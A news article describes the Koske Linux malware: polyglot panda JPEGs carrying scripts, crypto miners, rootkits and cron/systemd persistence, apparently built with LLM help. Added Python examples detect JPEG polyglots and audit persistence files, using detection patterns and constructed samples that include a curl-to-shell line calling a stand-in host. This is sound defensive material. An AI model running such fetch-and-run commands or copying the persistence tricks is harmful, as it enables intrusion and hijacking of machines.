
The emergence of generative artificial intelligence (AI) and large language models (LLMs) has led to an increase in the number of malicious bots and cyberattacks. Until recently, that was mostly true of criminals with only superficial programming knowledge; more advanced attackers can now use AI to create sophisticated malware.
Recently, malware called Koske was discovered. It hides in generated panda images (found among the files on the freeimage, postimage, and OVH images hosting sites) that are used to attack Linux systems. Koske combines image files, rootkits, and adaptive crypto-mining logic to create a hidden, persistent backdoor on the system.
The main feature of Koske is its use of polyglot files (a polyglot file is one that can be interpreted in different ways depending on the context or program that opens it), in particular JPEG images of pandas that look harmless to the user but contain embedded shell scripts and C code.
Once opened, the file looks like a cute picture, but it also runs malicious commands that deploy crypto miners optimized for both CPU and GPU and targeting 18 different coins (Monero, Ravencoin, Nexa, Tari, Zano, and others). The attackers gain initial access through unauthenticated or misconfigured JupyterLab instances.
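The polyglot layout the article describes, an image that is also a script, can be checked for without executing anything. The following is an added example written for this article; it is not Koske's code and not from the original page. It parses the JPEG segment structure up to the End Of Image marker and then inspects whatever bytes trail the image, flagging the file only when the trailer looks like shell or C source. The indicator patterns and the minimal sample JPEG are constructed for the example.

```python
"""Added example for this article: a small detector for JPEG polyglots.
Not Koske's code and not from the original page. It walks the JPEG segment
structure to the End Of Image (EOI) marker and inspects whatever is appended
behind it, since a script stuffed after the image is the classic polyglot
layout. The indicator patterns and the sample image below are constructed."""
import re
import struct

SOI = b"\xff\xd8"

# Heuristic indicators of a shell or C payload in the trailer (constructed list)
SCRIPT_INDICATORS = {
    "shebang": rb"#!/bin/(ba)?sh",
    "downloader": rb"\b(curl|wget)\b",
    "base64-decode": rb"base64\s+(-d|--decode)",
    "c-include": rb"#include\s*<",
}


def find_jpeg_eoi(data: bytes) -> int:
    """Return the offset just past the EOI marker (FF D9), parsing segments
    rather than searching for the bytes, so an FF D9 hidden inside scan data
    or metadata does not fool the check. Raises ValueError if not a JPEG."""
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                       # EOI: end of the image proper
            return pos + 2
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            pos += 2                             # standalone markers carry no length
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (seg_len,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + seg_len
        if marker == 0xDA:                       # SOS: skip entropy-coded scan data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break                        # a real marker, not FF00 stuffing or RSTn
                pos += 1
    raise ValueError("no EOI marker found")


def analyze_jpeg(data: bytes) -> dict:
    """Report how much data trails the image and which script indicators it contains."""
    end = find_jpeg_eoi(data)
    trailer = data[end:]
    hits = [name for name, pat in SCRIPT_INDICATORS.items() if re.search(pat, trailer)]
    return {
        "image_bytes": end,
        "trailing_bytes": len(trailer),
        "indicators": hits,
        # Some cameras append harmless metadata; only flag when the trailer looks like code.
        "suspicious": bool(trailer) and bool(hits),
    }


def build_sample_jpeg(payload: bytes = b"") -> bytes:
    """Constructed minimal JPEG skeleton (SOI, JFIF APP0, SOS with a few bytes of
    fake scan data that include an FF00 stuffing, EOI) with `payload` appended."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56"
    return SOI + app0 + sos + scan + b"\xff\xd9" + payload


# Constructed stand-in for an appended script; it only echoes a string.
SAMPLE_PAYLOAD = b"#!/bin/bash\n# constructed stand-in payload\necho polyglot\n"

if __name__ == "__main__":
    for label, blob in (("clean", build_sample_jpeg()),
                        ("polyglot", build_sample_jpeg(SAMPLE_PAYLOAD))):
        print(label, analyze_jpeg(blob))
```

Run it on a directory of downloaded images by reading each file's bytes into `analyze_jpeg`; a non-zero `trailing_bytes` alone is common and harmless, so the `suspicious` flag keys on the trailer resembling code rather than merely existing.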
If the connection to the hackers' Command & Control (C2) infrastructure is blocked, the malware diagnoses the problem on its own: it tries to reach the server via curl, wget, and raw TCP; flushes iptables rules; changes DNS settings; looks for new proxies in GitHub-hosted lists; and brute-forces proxy settings, all to restore communication with the command server.
When one mining pool shuts down, Koske dynamically switches to another pool (or another coin). It also uses rootkits to hide its files, processes, and even its own presence from security tools. It achieves persistence through cron jobs, modifications to .bashrc and .bash_logout, and even its own systemd services. Its communication module can detect proxies, which gives it resilience under different network conditions, a characteristic of AI-driven logic.
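The three persistence locations named above (cron entries, the shell rc files, and systemd units) are plain text and can be audited with simple rules. The following is an added example written for this article, not Koske's code and not from the original page: it scans each file line by line for a few constructed heuristics (execution from scratch directories, downloads piped into a shell, runtime base64 decoding, nohup backgrounding) and returns structured findings. The sample crontab, `.bashrc`, and unit file, including the name `miner.service` and the host `example.invalid`, are constructed for the example.

```python
"""Added example for this article (not Koske's code, not from the original page):
a persistence audit over the places the text names: cron entries, shell rc files
(.bashrc / .bash_logout) and systemd unit files. The rules are constructed
heuristics to be tuned for your own environment; the sample files are constructed."""
import re

# reason -> pattern; constructed heuristics, deliberately simple
RULES = {
    "runs from a scratch or world-writable directory":
        re.compile(r"""(?:^|[\s="'])(?:/tmp|/var/tmp|/dev/shm)/"""),
    "pipes a download straight into a shell":
        re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b"),
    "decodes base64 at runtime":
        re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
    "detaches a background process with nohup":
        re.compile(r"\bnohup\b"),
}


def audit_text(source: str, text: str) -> list:
    """Return one finding per (line, rule) hit; comment and blank lines are skipped."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for reason, rx in RULES.items():
            if rx.search(line):
                findings.append({"source": source, "line": lineno,
                                 "reason": reason, "text": stripped})
    return findings


def audit_path(path: str) -> list:
    """Audit a real file on disk (e.g. /etc/crontab, ~/.bashrc, a unit file)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_text(path, fh.read())


# Constructed samples: one benign-looking entry next to one suspicious entry each.
SAMPLE_CRONTAB = """\
# m h dom mon dow   command (constructed sample)
0 3 * * * /usr/bin/apt-get update
*/5 * * * * /dev/shm/.x/run.sh >/dev/null 2>&1
"""
SAMPLE_BASHRC = """\
# ~/.bashrc (constructed sample)
alias ll='ls -la'
export PATH="$HOME/bin:$PATH"
nohup /tmp/.hid/worker >/dev/null 2>&1 &
"""
SAMPLE_UNIT = """\
[Unit]
Description=Constructed sample unit
[Service]
ExecStart=/bin/sh -c "curl -s http://example.invalid/x | sh"
[Install]
WantedBy=multi-user.target
"""


def run_audit() -> list:
    """Audit the constructed samples and return all findings in file order."""
    samples = {"crontab": SAMPLE_CRONTAB,
               "~/.bashrc": SAMPLE_BASHRC,
               "miner.service": SAMPLE_UNIT}
    return [f for src, txt in samples.items() for f in audit_text(src, txt)]


if __name__ == "__main__":
    for f in run_audit():
        print(f"{f['source']}:{f['line']}: {f['reason']}\n    {f['text']}")
```

On a live host, point `audit_path` at `/etc/crontab`, the files under `/etc/cron.d`, each user's `.bashrc` and `.bash_logout`, and the unit files under `/etc/systemd/system`; treat the output as leads to review, since the rules will also match some legitimate administration scripts.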
Researchers have identified modular code structures, well-commented logic, and defensive programming patterns as signs that Koske was written using large language models (LLMs).
Already known threats
Recently, hackers infected more than 3,500 websites with hidden scripts that mine Monero (XMR). The malware does not steal passwords or lock files; instead, it turns the browsers of the infected websites' visitors into Monero mining engines.